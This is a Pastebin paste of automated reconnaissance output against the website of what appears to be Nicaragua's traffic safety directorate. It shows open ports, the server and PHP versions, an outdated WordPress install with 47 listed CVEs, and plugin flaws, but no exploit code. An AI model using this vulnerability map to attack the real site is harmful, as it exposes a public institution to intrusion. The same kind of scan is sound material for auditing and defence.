Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################################################################
- Hostname www.transitonacional.gob.ni ISP Unified Layer
- Continent North America Flag
- US
- Country United States Country Code US
- Region Utah Local time 08 Aug 2018 08:01 MDT
- City Provo Postal Code 84606
- IP Address 50.87.39.91 Latitude 40.218
- Longitude -111.613
- #######################################################################################################################################
- HostIP:50.87.39.91
- HostName:transitonacional.gob.ni
- Gathered Inet-whois information for 50.87.39.91
- ---------------------------------------------------------------------------------------------------------------------------------------
- Gathered Inic-whois information for transitonacional.gob.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Error: Unable to connect - Invalid Host
- ERROR: Connection to InicWhois Server ni.whois-servers.net failed
- close error
- Gathered Netcraft information for transitonacional.gob.ni
- --------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for transitonacional.gob.ni
- Netcraft.com Information gathered
- Gathered Subdomain information for transitonacional.gob.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host transitonacional.gob.ni, Searched 0 pages containing 0 results
- Gathered E-Mail information for transitonacional.gob.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host transitonacional.gob.ni, Searched 0 pages containing 0 results
- Gathered TCP Port information for 50.87.39.91
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 26/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 1 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://transitonacional.gob.ni
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Dirección de Seguridad de Transito
- [+] IP address: 50.87.39.91
- [+] Web Server: nginx/1.14.0
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- -----------[end of contents]-------------
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 50.87.39.91
- [i] Country: US
- [i] State: Utah
- [i] City: Provo
- [i] Latitude: 40.218102
- [i] Longitude: -111.613297
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 301 Moved Permanently
- [i] Server: nginx/1.14.0
- [i] Date: Wed, 08 Aug 2018 14:07:10 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Content-Length: 0
- [i] Connection: close
- [i] X-Powered-By: PHP/5.2.17
- [i] Vary: Cookie,Accept-Encoding
- [i] Location: http://www.transitonacional.gob.ni/
- [i] X-Acc-Exp: 600
- [i] X-Proxy-Cache: HIT transitonacional.gob.ni
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.14.0
- [i] Date: Wed, 08 Aug 2018 14:07:12 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- [i] X-Powered-By: PHP/5.2.17
- [i] Vary: Accept-Encoding,Cookie
- [i] Cache-Control: max-age=3, must-revalidate
- [i] WP-Super-Cache: Served supercache file from PHP
- [i] X-Acc-Exp: 3
- [i] X-Proxy-Cache: EXPIRED www.transitonacional.gob.ni
- D N S L O O K U P
- =======================================================================================================================================
- ;; Truncated, retrying in TCP mode.
- transitonacional.gob.ni. 3789 IN HINFO "ANY/RRSIG query Disabled" "See draft-ietf-dnsop-refuse-any"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 50.87.39.91
- Network = 50.87.39.91 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 50.87.39.91 - 50.87.39.91 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-08-08 14:07 UTC
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.10s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
- #######################################################################################################################################
- [?] Enter the target: http://www.transitonacional.gob.ni/
- [!] IP Address : 50.87.39.91
- [!] Server: nginx/1.14.0
- [!] Powered By: PHP/5.2.17
- [+] Clickjacking protection is not in place.
- [!] CMS Detected : WordPress
- [?] Would you like to use WPScan? [Y/n] Y
- [+] URL: http://www.transitonacional.gob.ni/
- [+] Started: Wed Aug 8 10:35:36 2018
- [+] Interesting header: SERVER: nginx/1.14.0
- [+] Interesting header: WP-SUPER-CACHE: Served supercache file from PHP
- [+] Interesting header: X-POWERED-BY: PHP/5.2.17
- [+] robots.txt available under: http://www.transitonacional.gob.ni/robots.txt [HTTP 200]
- [+] This site seems to be a multisite (http://codex.wordpress.org/Glossary#Multisite)
- [+] This site has 'Must Use Plugins' (http://codex.wordpress.org/Must_Use_Plugins)
- [+] Found an RSS Feed: http://www.transitonacional.gob.ni/feed [HTTP 200]
- [!] Missing Author field. Maybe non-standard WordPress RSS feed?
- [+] Enumerating WordPress version ...
- [+] WordPress version 4.4.2 (Released on 2016-02-02) identified from stylesheets numbers
- [!] 47 vulnerabilities identified from the version number
- [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
- Reference: https://wpvulndb.com/vulnerabilities/8473
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
- [i] Fixed in: 4.5
- [!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
- Reference: https://wpvulndb.com/vulnerabilities/8474
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
- [i] Fixed in: 4.5
- [!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8475
- Reference: https://codex.wordpress.org/Version_4.5
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
- [i] Fixed in: 4.5
- [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8488
- Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
- Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
- Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
- [i] Fixed in: 4.5.2
- [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
- Reference: https://wpvulndb.com/vulnerabilities/8489
- Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
- Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
- Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
- Reference: http://avlidienbrunn.com/wp_some_loader.php
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
- [i] Fixed in: 4.4.3
- [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
- Reference: https://wpvulndb.com/vulnerabilities/8518
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
- Reference: https://wpvulndb.com/vulnerabilities/8519
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
- Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
- Reference: https://wpvulndb.com/vulnerabilities/8520
- Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
- Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
- [i] Fixed in: 4.4.4
- [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
- Reference: https://wpvulndb.com/vulnerabilities/8615
- Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
- Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
- Reference: http://seclists.org/fulldisclosure/2016/Sep/6
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
- [i] Fixed in: 4.4.5
- [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
- Reference: https://wpvulndb.com/vulnerabilities/8616
- Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
- [i] Fixed in: 4.4.5
- [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
- Reference: https://wpvulndb.com/vulnerabilities/8714
- Reference: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
- Reference: https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
- Reference: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
- Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
- Reference: https://wpvulndb.com/vulnerabilities/8716
- Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
- Reference: https://wpvulndb.com/vulnerabilities/8718
- Reference: https://www.mehmetince.net/low-severity-wordpress/
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
- [i] Fixed in: 4.4.6
- [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
- Reference: https://wpvulndb.com/vulnerabilities/8719
- Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
- Reference: https://wpvulndb.com/vulnerabilities/8720
- Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
- Reference: https://wpvulndb.com/vulnerabilities/8721
- Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
- [i] Fixed in: 4.4.6
- [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
- Reference: https://wpvulndb.com/vulnerabilities/8729
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8730
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
- Reference: https://wpvulndb.com/vulnerabilities/8731
- Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
- [i] Fixed in: 4.4.7
- [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
- Reference: https://wpvulndb.com/vulnerabilities/8765
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
- Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
- Reference: http://seclists.org/oss-sec/2017/q1/563
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
- Reference: https://wpvulndb.com/vulnerabilities/8766
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
- Reference: https://wpvulndb.com/vulnerabilities/8768
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
- Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
- Reference: https://wpvulndb.com/vulnerabilities/8770
- Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
- Reference: http://seclists.org/oss-sec/2017/q1/562
- Reference: https://hackerone.com/reports/153093
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
- [i] Fixed in: 4.4.8
- [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
- Reference: https://wpvulndb.com/vulnerabilities/8807
- Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- Reference: https://core.trac.wordpress.org/ticket/25239
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
- [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
- Reference: https://wpvulndb.com/vulnerabilities/8815
- Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
- Reference: https://wpvulndb.com/vulnerabilities/8816
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
- Reference: https://wpvulndb.com/vulnerabilities/8817
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8818
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
- Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
- Reference: https://wpvulndb.com/vulnerabilities/8819
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
- Reference: https://hackerone.com/reports/203515
- Reference: https://hackerone.com/reports/203515
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
- Reference: https://wpvulndb.com/vulnerabilities/8820
- Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
- Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
- [i] Fixed in: 4.4.10
- [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8905
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
- Reference: https://wpvulndb.com/vulnerabilities/8906
- Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://wpvulndb.com/vulnerabilities/8905
- [i] Fixed in: 4.7.5
- [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
- Reference: https://wpvulndb.com/vulnerabilities/8910
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41398
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- Reference: https://wpvulndb.com/vulnerabilities/8911
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41457
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- Reference: https://wpvulndb.com/vulnerabilities/8913
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41448
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
- [i] Fixed in: 4.4.11
- [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- Reference: https://wpvulndb.com/vulnerabilities/8914
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41395
- Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
- [i] Fixed in: 4.4.11
- [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
- Reference: https://wpvulndb.com/vulnerabilities/8941
- Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
- Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
- Reference: https://twitter.com/ircmaxell/status/923662170092638208
- Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
- [i] Fixed in: 4.4.12
- [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
- Reference: https://wpvulndb.com/vulnerabilities/8966
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8967
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
- Reference: https://wpvulndb.com/vulnerabilities/8968
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
- Reference: https://wpvulndb.com/vulnerabilities/8969
- Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
- [i] Fixed in: 4.4.13
- [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/9006
- Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
- Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/ticket/42720
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
- [i] Fixed in: 4.4.14
- [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
- Reference: https://wpvulndb.com/vulnerabilities/9021
- Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
- Reference: https://github.com/quitten/doser.py
- Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
- [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
- Reference: https://wpvulndb.com/vulnerabilities/9053
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
- [i] Fixed in: 4.4.15
- [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
- Reference: https://wpvulndb.com/vulnerabilities/9054
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
- [i] Fixed in: 4.4.15
- [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
- Reference: https://wpvulndb.com/vulnerabilities/9055
- Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
- [i] Fixed in: 4.4.15
- [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
- Reference: https://wpvulndb.com/vulnerabilities/9100
- Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
- Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
- Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
- Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
- Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
- [i] Fixed in: 4.4.16
- [+] WordPress theme in use: newsmag
- [+] Name: newsmag
- | Latest version: 2.3.8
- | Last updated: 2017-07-28T00:00:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/
- | Readme: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/changelog.txt
- | Style URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/style.css
- [+] Enumerating plugins from passive detection ...
- | 6 plugins found:
- [+] Name: contact-form-7
- | Latest version: 5.0.3
- | Last updated: 2018-07-12T12:37:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/readme.txt
- | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/changelog.txt
- [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
- [!] Title: Contact Form 7 <= 3.7.1 - Security Bypass
- Reference: https://wpvulndb.com/vulnerabilities/7020
- Reference: http://www.securityfocus.com/bid/66381/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2265
- [i] Fixed in: 3.7.2
- [!] Title: Contact Form 7 <= 3.5.2 - File Upload Remote Code Execution
- Reference: https://wpvulndb.com/vulnerabilities/7022
- Reference: http://packetstormsecurity.com/files/124154/
- [i] Fixed in: 3.5.3
- [+] Name: easy-collapse-accordion
- | Latest version: 1.0
- | Last updated: 2013-12-26T00:50:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/readme.txt
